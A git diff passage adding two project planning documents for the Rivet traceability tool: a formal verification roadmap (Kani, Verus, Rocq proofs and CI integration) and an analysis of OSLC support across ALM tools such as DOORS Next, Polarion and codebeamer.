| 17 | +| UCAs | 45 | 3 | 48 | +| Controller constraints | 45 | 3 | 48 | +| Loss scenarios | 19 | 11 | 30 | +| **STPA total** | **151** | **23** | **174** | +| Requirements | 31 | 0 | 31 | +| Design decisions | 28 | 0 | 28 | +| Features | 67 | 0 | 67 | +| AADL components | 21 | 0 | 21 | +| **Grand total** | **328** | **23** | **351** | diff --git a/docs/plans/2026-03-16-formal-verification-completion.md b/docs/plans/2026-03-16-formal-verification-completion.md new file mode 100644 index 0000000..b7766d8 --- /dev/null +++ b/docs/plans/2026-03-16-formal-verification-completion.md @@ -0,0 +1,303 @@ +# Formal Verification Completion Plan + +**Issue:** #23 — Formal verification strategy (Kani + Verus + Rocq) +**Date:** 2026-03-16 +**Status:** Analysis complete, ready for execution + +--- + +## 1. Current State + +### 1.1 Kani (Bounded Model Checking) — 10 harnesses, ready for CI + +**File:** `rivet-core/src/proofs.rs` (gated behind `#[cfg(kani)]`) + +| # | Harness | Property proved | +|---|---------|-----------------| +| 1 | `proof_parse_artifact_ref_no_panic` | `parse_artifact_ref` never panics for any printable ASCII input up to 8 bytes | +| 2 | `proof_store_insert_no_panic` | `Store::insert` never panics for any bounded artifact | +| 3 | `proof_store_duplicate_returns_error` | Duplicate insert returns `Err`, store length stays 1 | +| 4 | `proof_coverage_percentage_bounds` | `CoverageEntry::percentage()` always in [0.0, 100.0]; edge cases at 0 and total=0 | +| 5 | `proof_cardinality_exhaustive` | `validate()` handles all `Cardinality` variants without panic for 0-2 links | +| 6 | `proof_compute_coverage_report_bounds` | End-to-end `compute_coverage` yields covered <= total, percentage in [0, 100] | +| 7 | `proof_schema_merge_idempotent` | `Schema::merge` with duplicate file preserves type/link/inverse counts | +| 8 | `proof_linkgraph_lone_artifact_is_orphan` | Unlinked artifact detected as orphan | +| 9 | `proof_linkgraph_dag_no_cycles` | A->B->C chain has no cycles | +| 10 | `proof_linkgraph_cycle_detected` | A->B->A cycle is correctly detected | + +**Integration status:** Module is declared in `lib.rs` (`#[cfg(kani)] mod proofs;`), `Cargo.toml` declares `cfg(kani)` in `unexpected_cfgs`. CI has a commented-out Kani job (lines 229-236 of `.github/workflows/ci.yml`). + +**Verdict: READY to uncomment and ship.** The `kani-github-action@v1` installs Kani automatically. No Bazel needed. + +### 1.2 Verus (SMT-backed functional correctness) — 6 specs, 3 proved + +**File:** `rivet-core/src/verus_specs.rs` (gated behind `#[cfg(verus)]`) + +| # | Spec/Proof | Status | +|---|-----------|--------| +| 1 | `store_well_formed` spec + `lemma_insert_preserves_wellformed` | **Proved** — inserting a fresh ID preserves store well-formedness | +| 2 | `backlink_symmetric` spec + `lemma_build_yields_symmetric` | **Proved** (from preconditions) — forward/backward link symmetry | +| 3 | `coverage_bounded` spec + `lemma_coverage_bounded` | **Proved** — coverage percentage in [0, 100] using vstd arithmetic lemmas | +| 4 | `validation_soundness` | **Spec only** — stated as open spec function, NOT proved. States: no errors implies all types known, no broken links, backlinks symmetric | +| 5 | `reachable_sound` + `reachable_complete` | **Spec only** — defines reachability with fuel-bounded induction, NOT proved | +| 6 | `coverage_validation_agreement` | **Spec only** — 100% coverage implies no error diagnostics for that rule, NOT proved | + +**Integration status:** `verus/BUILD.bazel` defines `verus_library` and `verus_test` targets. `verus/MODULE.bazel` references `pulseengine/rules_verus` (commit `e2c1600`). Requires Bazel 8+ and a nightly Rust toolchain (1.82.0-nightly pinned by Verus). + +**Verdict: NOT runnable in CI today.** Requires Bazel infrastructure and rules_verus to be published/available. The 3 unproved specs need substantial proof work. + +### 1.3 Rocq (Deep metamodel proofs) — 24 Qed, 1 Admitted + +**Files:** `proofs/rocq/Schema.v` (667 lines), `proofs/rocq/Validation.v` (201 lines) + +#### Schema.v — 17 Qed, 1 Admitted + +| # | Theorem/Lemma | Status | +|---|--------------|--------| +| 1 | `schema_satisfiable` | **Proved** — empty store satisfies any rule set | +| 2 | `monotonicity_non_source` | **Proved** — adding non-source artifact preserves validity | +| 3 | `validation_empty_store` | **Proved** — zero work for empty store | +| 4 | `validation_empty_rules` | **Proved** — zero work for empty rule set | +| 5 | `validation_work_add_one` | **Proved** — adding one artifact adds |rules| work | +| 6 | `store_get_not_in` | **Proved** — lookup returns None if ID not present | +| 7 | `store_get_in` | **Proved** — lookup succeeds for present ID in unique store | +| 8 | `broken_link_detection_sound` | **Proved** — absent target means link is broken | +| 9 | `store_get_app_new` | **Proved** — newly appended artifact is retrievable | +| 10 | `insert_then_get` | **Proved** — insert then get returns the artifact | +| 11 | `store_get_app_old` | **Proved** — insert preserves old lookups | +| 12 | `insert_preserves_old` | **Proved** — insert doesn't affect other artifact retrieval | +| 13 | `insert_duplicate_fails` | **Proved** — duplicate ID insert returns None | +| 14 | `backlink_from_forward_link` | **Proved** — forward link induces backlink | +| 15 | `vmodel_chain_two_steps` | **Proved** — two consecutive rules imply reachability | +| 16 | `single_rule_constructible` | **Proved** — any single rule is satisfiable | +| 17 | `no_source_no_violations` | **Proved** — no source artifacts means zero violations | +| 18 | `zero_violations_implies_satisfied` | **ADMITTED** — requires inductive reasoning over `filter` | + +#### Validation.v — 7 Qed, 0 Admitted + +| # | Theorem/Lemma | Status | +|---|--------------|--------| +| 1 | `validation_deterministic` | **Proved** — pure function, reflexivity | +| 2 | `empty_store_no_diagnostics` | **Proved** — empty store yields empty diagnostics | +| 3 | `check_broken_links_reports` | **Proved** — broken link always produces SevError diagnostic | +| 4 | `check_broken_links_clean` | **Proved** — all targets present means no broken-link diags | +| 5 | `check_artifact_rule_clean` | **Proved** — non-matching artifact kind means no rule diag | +| 6 | `check_broken_links_length` | **Proved** — broken-link diags bounded by link count | +| 7 | `check_artifact_rules_length` | **Proved** — rule diags bounded by rule count | + +**Totals: 24 proved (Qed), 1 admitted.** + +**Integration status:** `proofs/rocq/BUILD.bazel` defines targets using `rules_rocq_rust`. `proofs/rocq/MODULE.bazel` references `pulseengine/rules_rocq_rust` (commit `6a8da0b`) and requires Nix + Bazel 8+ for hermetic Rocq 9.0 toolchain. + +**Verdict: NOT runnable in CI today.** Requires Bazel + Nix infrastructure. One admitted theorem needs completion. + +--- + +## 2. Gap Analysis + +### 2.1 What's proved vs what's spec'd but not proved + +| Layer | Proved | Spec'd only | Admitted | Total | +|-------|--------|-------------|----------|-------| +| Kani | 10 harnesses (all complete) | 0 | 0 | 10 | +| Verus | 3 lemmas | 3 specs (validation_soundness, reachability, coverage-validation agreement) | 0 | 6 | +| Rocq | 24 theorems | 0 | 1 (zero_violations_implies_satisfied) | 25 | +| **Total** | **37** | **3** | **1** | **41** | + +### 2.2 What's missing from Issue #23 scope + +Issue #23 calls for proofs of: + +| Desired proof | Current status | +|--------------|----------------| +| `LinkGraph::build()` no panics | **Partially covered** — Kani #5, #8-10 exercise build indirectly, but no dedicated harness for arbitrary store+schema | +| `parse_artifact_ref()` all inputs | **Done** — Kani #1 | +| `Schema::merge()` never panics, preserves types | **Done** — Kani #7 (idempotence); no explicit panic-freedom harness | +| `validate()` cardinality logic exhaustive | **Done** — Kani #5 | +| `detect_circular_deps()` DFS terminates, finds all cycles | **Partially covered** — Kani #9, #10 test DAG/cycle but not DFS termination | +| MODULE.bazel parser all inputs | **Not started** — no Kani harness for Bazel parser | +| Validation soundness (PASS -> rules satisfied) | **Spec only** — Verus spec #4, not proved | +| Validation completeness (violated -> diagnostic) | **Partially covered** — Rocq `zero_violations_implies_satisfied` is ADMITTED | +| Backlink symmetry | **Done** — Verus #2 proved, Rocq #14 proved | +| Conditional rule consistency | **Not started** | +| Reachability correctness | **Spec only** — Verus #5 | +| Schema satisfiability | **Done** — Rocq #1 | +| Monotonicity | **Done** — Rocq #2 | +| Link graph well-foundedness / validation terminates | **Done** — Rocq #3-5 | +| ASPICE V-model completeness | **Partially covered** — Rocq #15 (two-step chain) | + +### 2.3 CI integration gaps + +| Tool | CI status | Blocker | +|------|-----------|---------| +| Kani | **Commented out** in ci.yml (lines 229-236) | None — just uncomment | +| Verus | No CI job | Requires Bazel + rules_verus + nightly Rust 1.82.0 | +| Rocq | No CI job | Requires Bazel + rules_rocq_rust + Nix + Rocq 9.0 | + +--- + +## 3. CI Integration Plan + +### 3.1 Kani — Immediate (uncomment existing job) + +The ci.yml already has a commented-out Kani job at lines 229-236: + +```yaml +kani: + name: Kani Proofs + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v6 + - uses: model-checking/kani-github-action@v1 + - run: cargo kani -p rivet-core +``` + +**Action:** Uncomment. The `kani-github-action@v1` handles installation. `cargo kani -p rivet-core` runs all 10 harnesses. Estimated CI time: 5-15 minutes depending on solver performance. + +**Considerations:** +- Pin `kani-version` for reproducibility (e.g., `kani-version: '0.50.0'`) +- Add `continue-on-error: false` to block PRs on proof failure +- Consider caching: Kani compiles CBMC which is slow on first run; the action caches internally + +### 3.2 Verus — Medium-term (requires Bazel in CI) + +Two paths: + +**Path A: Bazel in CI (preferred)** +- Add a Bazel CI job that runs `bazel test //verus:rivet_specs_verify` +- Requires: `rules_verus` published, Bazel 8+ on runner, ~10 min setup +- Blocked on: `pulseengine/rules_verus` being a real, working Bazel module + +**Path B: Direct Verus invocation (workaround)** +- Install Verus nightly binary in CI +- Run `verus rivet-core/src/verus_specs.rs` directly +- Problem: the file uses `use crate::...` imports that won't resolve outside cargo + +**Recommendation:** Path A. Park until Bazel is adopted for the project. + +### 3.3 Rocq — Medium-term (requires Bazel + Nix in CI) + +**Path A: Bazel + Nix in CI (preferred)** +- Add a Bazel CI job: `bazel test //proofs/rocq:rivet_metamodel_test` +- Requires: `rules_rocq_rust` published, Nix on runner, Bazel 8+ +- Estimated CI time: 2-5 minutes (Rocq proofs compile fast) + +**Path B: Direct coqc invocation (workaround)** +- Install Rocq/Coq 9.0 via Nix or apt +- Run `coqc -Q proofs/rocq Rivet proofs/rocq/Schema.v proofs/rocq/Validation.v` +- Simpler but non-hermetic + +**Path C: Nix-only CI job (intermediate)** +```yaml +rocq: + name: Rocq Proofs + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v6 + - uses: cachix/install-nix-action@v27 + - run: | + nix-env -iA nixpkgs.coq + coqc -Q proofs/rocq Rivet proofs/rocq/Schema.v + coqc -Q proofs/rocq Rivet proofs/rocq/Validation.v +``` + +**Recommendation:** Path C as an immediate step, Path A when Bazel is adopted. + +--- + +## 4. Prioritized New Proofs to Add + +### Priority 1 — High value, low effort (next sprint) + +| # | Proof | Tool | Rationale | +|---|-------|------|-----------| +| 1 | `proof_linkgraph_build_no_panic` — arbitrary store+schema | Kani | Issue #23 explicitly calls for this; exercises the core graph builder | +| 2 | `proof_schema_merge_no_panic` — arbitrary schema files | Kani | Dedicated panic-freedom proof (current #7 only tests idempotence) | +| 3 | `proof_validate_no_panic` — arbitrary store+schema+graph | Kani | Most critical: validate is the safety-critical function | +| 4 | Complete `zero_violations_implies_satisfied` | Rocq | The only Admitted theorem; requires inductive filter reasoning | +| 5 | Uncomment Kani CI job | CI | Zero-cost, immediate value | + +### Priority 2 — Medium effort, high value (next month) + +| # | Proof | Tool | Rationale | +|---|-------|------|-----------| +| 6 | `proof_detect_cycles_terminates` — DFS terminates for any graph | Kani | Issue #23 scope; verify `has_cycles` terminates | +| 7 | Prove `validation_soundness` | Verus | The highest-value proof: PASS means all rules satisfied | +| 8 | Prove `reachable_sound` + `reachable_complete` | Verus | Reachability correctness for transitive closure | +| 9 | ASPICE full V-model chain (N steps, not just 2) | Rocq | Extend `vmodel_chain_two_steps` to arbitrary chains | +| 10 | Rocq CI job (Path C: Nix-based) | CI | Proves Rocq proofs compile on every PR | + +### Priority 3 — Higher effort, strategic value (quarter) + +| # | Proof | Tool | Rationale | +|---|-------|------|-----------| +| 11 | Prove `coverage_validation_agreement` | Verus | 100% coverage implies no error diags | +| 12 | Conditional rule consistency | Verus | No contradictions when rules co-fire | +| 13 | MODULE.bazel parser panic-freedom | Kani | Issue #23 scope; lower priority since not safety-critical path | +| 14 | Verus CI via Bazel | CI | Requires Bazel adoption | +| 15 | `coq-of-rust` extraction | Rocq | Auto-extract Rocq model from Rust source; experimental | + +--- + +## 5. Timeline Estimate + +| Phase | Duration | Deliverables | +|-------|----------|-------------| +| **Week 1** (immediate) | 1-2 days | Uncomment Kani CI job; add 3 new Kani harnesses (#1-3 above) | +| **Week 2** | 3-5 days | Complete Rocq admitted theorem (#4); add Rocq Nix CI job (#10) | +| **Weeks 3-4** | 1-2 weeks | Kani cycle-termination proof (#6); begin Verus validation_soundness proof (#7) | +| **Month 2** | 2-3 weeks | Complete Verus reachability proofs (#8); ASPICE full chain (#9) | +| **Month 3** | 2-3 weeks | Verus coverage-validation agreement (#11); conditional rules (#12); Bazel CI (#14) | + +**Total estimated effort:** ~6-8 weeks of focused formal verification work. + +--- + +## 6. Can We Run Kani Right Now? + +**In CI: YES.** Uncomment lines 229-236 in `.github/workflows/ci.yml`. The `kani-github-action@v1` handles all installation. The 10 harnesses are self-contained and compile correctly under `#[cfg(kani)]`. + +**Locally: Requires installation.** Kani is not installed on this machine. Install via: +```bash +cargo install --locked kani-verifier +cargo kani setup +cargo kani -p rivet-core +``` + +**Expected outcome:** All 10 harnesses should pass. The harnesses use small bounds (8 bytes, 4 chars, 3 artifacts) to keep solver time manageable. + +--- + +## 7. rules_verus and rules_rocq_rust Integration Status + +### rules_verus (`verus/MODULE.bazel`) +- **Source:** `pulseengine/rules_verus` (GitHub) +- **Commit:** `e2c1600a8cca4c0deb78c5fcb4a33f1da2273d29` +- **Verus version:** `0.2026.02.15` +- **Requirements:** Bazel 8+, Rust nightly (1.82.0, pinned by Verus) +- **Status:** BUILD.bazel and MODULE.bazel are written. Depends on `rules_verus` being a functional Bazel module (may need real implementation work in the `pulseengine/rules_verus` repo). + +### rules_rocq_rust (`proofs/rocq/MODULE.bazel`) +- **Source:** `pulseengine/rules_rocq_rust` (GitHub) +- **Commit:** `6a8da0bd30b5f80f811acefbf6ac5740a08d4a8c` +- **Rocq version:** 9.0 via Nix +- **Requirements:** Bazel 8+, Nix package manager, `rules_nixpkgs_core` 0.13.0 +- **Status:** BUILD.bazel and MODULE.bazel are written. Depends on `rules_rocq_rust` being a functional Bazel module. The Nix dependency adds complexity but ensures hermetic toolchains. + +**Neither Bazel module is likely functional today** — both reference `pulseengine/rules_*` repos that may be stubs or works-in-progress. The Rocq proofs can be verified independently with plain `coqc`; the Verus specs need the Verus toolchain but could potentially be verified with a standalone Verus binary. + +--- + +## 8. Summary Scorecard + +| Metric | Value | +|--------|-------| +| Kani harnesses | 10 (all complete) | +| Verus specs | 6 (3 proved, 3 spec-only) | +| Rocq theorems | 25 (24 Qed, 1 Admitted) | +| **Total proved** | **37** | +| **Total spec'd but not proved** | **4** | +| CI integration | Kani ready (commented out), Verus/Rocq blocked on Bazel | +| Lowest-hanging fruit | Uncomment Kani CI job (5-minute task) | +| Biggest gap | Verus `validation_soundness` — the most important proof, not yet attempted | +| ISO 26262 readiness | Strong foundation; need validation soundness proof for TCL 1 argument | diff --git a/docs/plans/2026-03-16-oslc-analysis.md b/docs/plans/2026-03-16-oslc-analysis.md new file mode 100644 index 0000000..2c783ed --- /dev/null +++ b/docs/plans/2026-03-16-oslc-analysis.md @@ -0,0 +1,490 @@ +# OSLC Ecosystem Analysis and Strategic Recommendation + +**Date:** 2026-03-16 +**Artifacts:** REQ-006, FEAT-011, DD-001 +**Status:** Research complete, recommendation pending decision + +--- + +## 1. What Rivet's OSLC Module Already Implements + +The existing implementation in `rivet-core/src/oslc.rs` (~1870 lines) is a +well-structured OSLC client that covers the core protocol mechanics. Feature-gated +behind `#[cfg(feature = "oslc")]` to isolate the `reqwest` dependency. + +### Implemented (working, tested) + +| Capability | Status | Evidence | +|---|---|---| +| Service Provider Catalog discovery | Complete | `OslcClient::discover()`, wiremock test | +| OSLC Query with `oslc.where` / `oslc.select` | Complete | `OslcClient::query()`, wiremock test | +| Pagination support (next_page parsing) | Partial | Response struct supports it, no auto-follow | +| GET single resource (JSON-LD) | Complete | `OslcClient::get_resource()`, wiremock test | +| POST to creation factory | Complete | `OslcClient::create_resource()`, wiremock test | +| PUT to update resource | Complete | `OslcClient::update_resource()`, wiremock test | +| Basic auth | Complete | `with_basic_auth()`, wiremock test | +| Bearer token auth | Complete | `with_bearer_token()`, wiremock test | +| RM domain types (Requirement) | Complete | `OslcRequirement` struct, full serde | +| QM domain types (TestCase, TestResult) | Complete | `OslcTestCase`, `OslcTestResult` structs | +| CM domain types (ChangeRequest) | Complete | `OslcChangeRequest` struct | +| OSLC-to-Artifact mapping | Complete | `oslc_to_artifact()`, 6 link types mapped | +| Artifact-to-OSLC mapping | Complete | `artifact_to_oslc()`, bidirectional | +| Sync diff computation | Complete | `compute_diff()` with remote/local/modified/unchanged | +| SyncAdapter trait (pull/push/diff) | Complete | `OslcSyncAdapter` implements trait | +| Pull (query -> artifacts) | Complete | Tested with mixed resource types | +| Push (artifacts -> create) | Basic | Always POSTs; no create-vs-update logic | +| Error handling (HTTP codes, malformed JSON) | Complete | 404, 500, malformed JSON/catalog tests | +| JSON-LD @type dispatching | Complete | `parse_member_resource()` with fallback | + +### Not Implemented (gaps for real-world use) + +| Gap | Severity | Notes | +|---|---|---| +| DELETE resource | Minor | Not needed for most sync workflows | +| TRS (Tracked Resource Set) | Major | Required for incremental sync; currently full-pull only | +| OAuth 1.0a (Jazz Form Auth) | **Critical** | IBM ELM uses Jazz form-based auth + OAuth 1.0a, not Basic/Bearer | +| OAuth 2.0 / OIDC | **Critical** | Modern Polarion/codebeamer may require OIDC | +| Resource Shapes validation | Medium | No shape discovery or constraint checking | +| ETag / If-Match concurrency | Medium | No optimistic concurrency control on PUT | +| Pagination auto-follow | Minor | `next_page` is parsed but not auto-followed | +| Delegated Dialogs | Low | Only needed for embedded UI (not Rivet's pattern) | +| OSLC-Core-Version 3.0 header | Minor | Currently sends "2.0"; should be configurable | +| Configuration Management (versions/baselines) | Major | No OSLC Config support for versioned resources | +| ASPICE type mapping | **Critical** | Only maps 4 generic types; no mapping for ASPICE's 14 types | +| Push with diff-based create/update | Medium | Push always creates; no update-existing logic | +| Rate limiting / retry | Minor | No backoff or retry on transient failures | +| RDF/XML content type | Medium | Only JSON-LD; codebeamer requires `application/rdf+xml` | + +--- + +## 2. OSLC Core 3.0 Specification Requirements + +OSLC Core 3.0 (OASIS Standard, August 2021) is an 8-part multi-part specification. +It was designed for backward compatibility with OSLC 2.0 -- most 2.0 servers remain +3.0 compliant without changes. + +### Parts of the Specification + +| Part | Title | Client relevance | +|---|---|---| +| 1 | Overview | Architecture guidance | +| 2 | Discovery | **Required** -- catalog, service providers | +| 3 | Resource Preview | Optional -- compact rendering for UI | +| 4 | Delegated Dialogs | Optional -- embedded creation/selection UI | +| 5 | Attachments | Optional -- binary file handling | +| 6 | Resource Shape | **Important** -- server resource validation | +| 7 | Vocabulary | **Required** -- common terms (dcterms, oslc) | +| 8 | Constraints | Machine-readable shapes | + +### What a Conformant Client MUST Do + +1. Preserve unknown properties between GET and PUT (Rivet's `extra: BTreeMap` field + does this correctly for typed resources, but `serde(flatten)` may drop nested + JSON-LD constructs) +2. Send `OSLC-Core-Version: 2.0` header (currently implemented correctly) +3. Support content negotiation for at least one RDF format + +### What a Conformant Server MUST Do (not Rivet's concern as a client) + +1. Support GET returning RDF +2. Return OSLC-Core-Version header +3. Implement OSLC Core vocabulary + +### Domain Specifications (OASIS Standards) + +| Domain | Version | Key resources | +|---|---|---| +| Requirements Management (RM) | 2.1 | Requirement, RequirementCollection | +| Quality Management (QM) | 2.1 | TestCase, TestResult, TestPlan, TestExecutionRecord | +| Change Management (CM) | 3.0 | ChangeRequest | +| Architecture Management (AM) | 3.0 | Resource (generic) | +| Configuration Management | 1.0 | Versions, baselines, change sets | +| Tracked Resource Set (TRS) | 3.0 | Base + ChangeLog for incremental sync | + +### TRS (Tracked Resource Set) -- Key for Incremental Sync + +TRS is the mechanism for change tracking without polling individual resources. +A TRS provides: +- **Base**: point-in-time enumeration of all tracked resources (LDP Container) +- **Change Log**: ordered series of creation/modification/deletion events +- **Cutoff**: point in the change log already reflected in the base + +A client reads the Base initially, then polls the Change Log for deltas. +This is conceptually similar to git fetch -- get the full state once, +then apply incremental changes. + +**Assessment**: TRS is essential for production OSLC sync but adds significant +complexity. Without TRS, Rivet must do full-pull-and-diff on every sync, +which is acceptable for small/medium artifact sets (< 10,000) but not for +large enterprise deployments. + +--- + +## 3. Real ALM Tools and Their Actual OSLC Support + +### IBM DOORS Next (ELM) -- The Gold Standard + +**OSLC support: Deep, native, original** + +DOORS Next is the reference OSLC implementation. IBM created OSLC. + +- **Domains**: RM (native provider), QM consumer, CM consumer +- **OSLC version**: 2.0 with some 3.0 extensions +- **Auth**: Jazz Form-based auth + OAuth 1.0a (not Basic Auth). + Modern versions support OIDC (OpenID Connect). + The authentication flow is complex: GET protected resource -> receive + `X-com-ibm-team-repository-web-auth-msg: authrequired` header -> + POST credentials to `/j_security_check` -> follow redirects -> get JSESSIONID. + This is significantly more complex than Basic/Bearer auth. +- **TRS**: Supported. IBM uses TRS extensively for cross-tool integration + within the ELM suite. +- **Config Management**: Supported (global configurations, baselines). +- **Practical notes**: DOORS Next is the most OSLC-capable tool, but its + authentication mechanism is the most complex. Many OSLC client libraries + exist for Java (Eclipse Lyo) but very few for Rust/non-Java languages. + Module-level operations (document structure) are not fully exposed via OSLC. + +### Siemens Polarion -- Partial, Growing + +**OSLC support: Partial native, supplemented by OSLC Connect** + +- **Domains**: RM (native), CM (native). **QM not natively supported** -- + requires manual admin configuration to add QM semantics. +- **OSLC version**: 2.0 / partial 3.0 +- **Auth**: Basic Auth or token-based auth. More straightforward than Jazz. +- **REST API**: Polarion has a rich proprietary REST API (actively developed, + version 2512 current) that is more capable than its OSLC endpoint for + many operations. The REST API covers gaps that OSLC does not. +- **OSLC Connect**: Third-party product (SodiusWillert) that provides enhanced + OSLC integration for Polarion, including linking to Jira, DOORS, etc. + This suggests Polarion's native OSLC is not sufficient for cross-tool + integration without middleware. +- **ReqIF**: Fully supported for import/export. +- **Practical notes**: For Polarion integration, the proprietary REST API + is more practical than OSLC for most use cases. OSLC is primarily used + for cross-tool linking with IBM ELM, not as the primary integration method. + +### PTC codebeamer -- Partial, Evolving + +**OSLC support: Provider and consumer, RM and CM domains** + +- **Domains**: RM (provider/consumer), CM (provider/consumer). + QM integration with IBM ETM added in codebeamer 3.1 (August 2025). +- **OSLC version**: 3.0 header required (`OSLC-Core-version: 3.0`) +- **Content type**: Requires `application/rdf+xml` (not JSON-LD!). + This is a significant incompatibility with Rivet's current JSON-LD-only client. +- **Auth**: Basic Auth supported. +- **OSLC usage**: Primarily for linking with Windchill PLM and IBM ELM. + Not the primary integration API for standalone use. +- **ReqIF**: Supported since codebeamer 7.6.0 for interchange with DOORS. +- **REST API**: codebeamer has a comprehensive proprietary REST API that + is the primary integration method for most customers. +- **Practical notes**: codebeamer's OSLC is focused on PLM-to-ALM linking + (PTC ecosystem integration), not on general-purpose data sync. + +### Jama Connect -- External Adapter Only + +**OSLC support: Not native. Requires third-party adapter.** + +- **No native OSLC**: Jama does not implement OSLC natively. +- **OSLC adapter**: Available via Koneksys (oslc-adapter-jama on GitHub), + which wraps Jama's REST API as an OSLC provider. This adapter supports + RM domain and OAuth 1.0a but is a community/third-party project. +- **OSLC Model Connector**: Partnership with MiD/Smartfacts provides + MBSE integration via OSLC, but this is for model-to-requirements linking, + not general artifact sync. +- **REST API**: Jama has a well-documented REST API that is the primary + integration method. +- **Practical notes**: Integrating with Jama via OSLC requires running a + separate adapter service. Direct REST API integration is more practical. + +### Summary: Actual OSLC Implementation Reality + +| Tool | Native OSLC | RM | QM | CM | TRS | Auth Method | Primary API | +|---|---|---|---|---|---|---|---| +| DOORS Next | Yes (deep) | Yes | Yes | Yes | Yes | Jazz OAuth 1.0a / OIDC | OSLC | +| Polarion | Partial | Yes | No* | Yes | No | Basic / Token | Proprietary REST | +| codebeamer | Partial | Yes | Partial | Yes | No | Basic | Proprietary REST | +| Jama Connect | No | Adapter | No | No | No | OAuth 1.0a (adapter) | Proprietary REST | + +*\* QM requires admin-level semantic configuration* + +**Key finding**: Only IBM DOORS Next uses OSLC as its primary integration API. +Polarion, codebeamer, and Jama all have proprietary REST APIs that are more +capable, better documented, and more widely used than their OSLC endpoints. + +--- + +## 4. The ASPICE Type Mapping Problem + +Rivet's OSLC module maps only 4 generic OSLC types: + +| OSLC Type | Rivet artifact type | +|---|---| +| oslc_rm:Requirement | requirement | +| oslc_qm:TestCase | test-case | +| oslc_qm:TestResult | test-result | +| oslc_cm:ChangeRequest | change-request | + +But ASPICE v4.0 defines 14 artifact types that Rivet tracks: + +| ASPICE Type | ASPICE Process | OSLC Mapping? | +|---|---|---| +| stakeholder-req | SYS.1 | oslc_rm:Requirement (lossy) | +| system-req | SYS.2 | oslc_rm:Requirement (lossy) | +| system-arch-component | SYS.3 | No OSLC equivalent | +| sw-req | SWE.1 | oslc_rm:Requirement (lossy) | +| sw-arch-component | SWE.2 | No OSLC equivalent | +| sw-detail-design | SWE.3 | No OSLC equivalent | +| unit-verification | SWE.4 | oslc_qm:TestCase (lossy) | +| sw-integration-verification | SWE.5 | oslc_qm:TestCase (lossy) | +| sw-verification | SWE.6 | oslc_qm:TestCase (lossy) | +| sys-integration-verification | SYS.4 | oslc_qm:TestCase (lossy) | +| sys-verification | SYS.5 | oslc_qm:TestCase (lossy) | +| verification-execution | -- | oslc_qm:TestResult (partial) | +| verification-verdict | -- | oslc_qm:TestResult (partial) | + +**Fundamental problem**: OSLC's 4 resource types cannot represent ASPICE's +14-type V-model without information loss. The `aspice-process` field, +`method` field (automated-test, review, formal-verification, etc.), and the +detailed link types (derives-from, allocated-from, refines, verifies, +result-of, part-of-execution) have no OSLC-standard representation. + +Workaround options: +1. Use `dcterms:type` or custom RDF properties to carry ASPICE type info + (non-standard, tool-specific) +2. Map everything to generic Requirement/TestCase and lose type granularity +3. Use ReqIF instead, which preserves arbitrary attribute schemas + +--- + +## 5. Eclipse SCORE and the Competitive Context + +Eclipse SCORE (Safe Open Vehicle Core) is the primary adoption target for Rivet. + +**SCORE's tooling approach**: +- **Documentation**: Sphinx + sphinx-needs (docs-as-code) +- **Requirements format**: `needs.json` (sphinx-needs export format) +- **Metamodel**: 50+ need types defined in `metamodel.yaml` +- **No OSLC usage**: SCORE does not use OSLC for tool synchronization +- **No ReqIF usage**: SCORE uses `needs.json` as its interchange format +- **Version control**: Git-based, plain text files + +**Implication for Rivet**: The SCORE adoption opportunity (the strategic priority +per Rivet's roadmap) requires `needs.json` import (already implemented), not OSLC. +SCORE projects will not have Polarion or DOORS to sync with -- they use +sphinx-needs and git. + +--- + +## 6. Alternative Approaches + +### A. ReqIF Interchange (Already Implemented) + +Rivet already has a working ReqIF 1.2 adapter (`rivet-core/src/reqif.rs`). + +**Strengths**: +- Universal support: DOORS, Polarion, codebeamer all import/export ReqIF +- File-based: works across organizational boundaries (no server access needed) +- Preserves arbitrary attributes via ReqIF SPEC-OBJECT-TYPE/ATTRIBUTE +- Git-friendly when stored as XML files +- OMG standard with strong automotive industry adoption +- No authentication complexity + +**Weaknesses**: +- Not real-time; requires explicit export/import cycles +- No incremental sync (full document exchange) +- XML verbosity +- Tool-specific attribute mapping still needed + +**Assessment**: ReqIF is the proven interchange format for cross-company +requirements exchange in automotive. Every major ALM tool supports it. It is +the right format for "send requirements to supplier / receive from customer" +workflows, which is the dominant integration pattern in ASPICE processes. + +### B. needs.json Import (Already Implemented) + +Rivet already has a working needs.json adapter (`rivet-core/src/formats/needs_json.rs`). + +**Strengths**: +- Direct path to Eclipse SCORE adoption +- JSON format, lightweight, git-friendly +- Preserves sphinx-needs-specific metadata +- No server infrastructure required + +**Assessment**: This is the highest-priority integration for the SCORE adoption +play. Already implemented. + +### C. Direct REST Adapters Per Tool + +The approach OSLC was supposed to replace. Build specific adapters for +each tool's proprietary REST API. + +**Strengths**: +- Full access to tool-specific features +- Better documentation and community support +- More reliable authentication +- Can leverage tool-specific SDKs + +**Weaknesses**: +- N adapters for N tools (maintenance burden) +- API versioning and deprecation risk +- Each adapter is a significant effort + +**Assessment**: Pragmatic but not scalable. Should be considered only for +the 1-2 tools with the highest demand from actual users. + +### D. Git-Based Sync (Export/Import YAML) + +Rivet's native format is YAML in git. The simplest "sync" is: +1. Export YAML from Rivet +2. Commit to a shared git repo +3. Other tools import from the repo (via adapter) + +**Strengths**: +- Zero infrastructure +- Full Rivet fidelity (no lossy mapping) +- Git provides history, branching, merge +- Already how SCORE projects work + +**Assessment**: This is actually the dominant real-world pattern for +docs-as-code projects. It works when the "other tool" can import YAML/JSON. + +--- + +## 7. Strategic Assessment + +### The DD-001 Decision Should Be Revisited + +DD-001 ("OSLC over per-tool REST adapters") was based on the premise that +"Polarion, DOORS, and codebeamer already support [OSLC] natively" and that +"one adapter handles all tools." + +**This premise is only partly true**: + +1. Only DOORS Next has deep, native OSLC support. Polarion and codebeamer + have partial OSLC that is secondary to their proprietary REST APIs. + +2. OSLC's 4 resource types cannot represent ASPICE's 14-type V-model + without information loss. ReqIF can. + +3. OSLC authentication (Jazz OAuth, OIDC) is significantly more complex + than the Basic/Bearer auth currently implemented. A production OSLC + client for DOORS Next requires implementing Jazz form-based auth, + which involves multi-step HTTP redirects, cookie management, and + CSRF token handling. + +4. The OSLC ecosystem has low adoption: research indicates only ~20% of + the 25 most prevalent ALM tools have any OSLC capability. + +5. Eclipse SCORE (Rivet's strategic adoption target) does not use OSLC. + +### The Existing OSLC Code Is Not Wasted + +The OSLC module is well-architected and serves as a solid foundation: +- The `SyncAdapter` trait is useful regardless of protocol +- The mapping layer (`oslc_to_artifact`, `artifact_to_oslc`) 